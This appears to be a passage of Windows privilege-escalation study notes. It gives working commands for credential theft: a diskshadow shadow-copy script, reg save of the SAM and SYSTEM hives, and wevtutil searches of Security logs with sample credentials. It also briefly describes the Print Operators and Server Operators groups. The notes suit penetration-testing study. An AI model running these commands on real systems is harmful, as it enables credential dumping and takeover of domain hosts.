diskshadow.exeDISKSHADOW> set verbose onDISKSHADOW> set metadata C:\Windows\Temp\meta.cabDISKSHADOW> set context clientaccessibleDISKSHADOW> set context persistentDISKSHADOW>begin backupDISKSHADOW> add volume C: alias cdriveDISKSHADOW> createDISKSHADOW> expose %cdrive% E:DISKSHADOW>end backupDISKSHADOW>exit
Backup SAM + SYSTEM Hives
reg save HKLM\SYSTEM SYSTEM.SAVreg save HKLM\SAM SAM.SAV
# Without Credentialswevtutil qe Security /rd:true /f:text |Select-String"/user"# With Credentialswevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.
Allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.
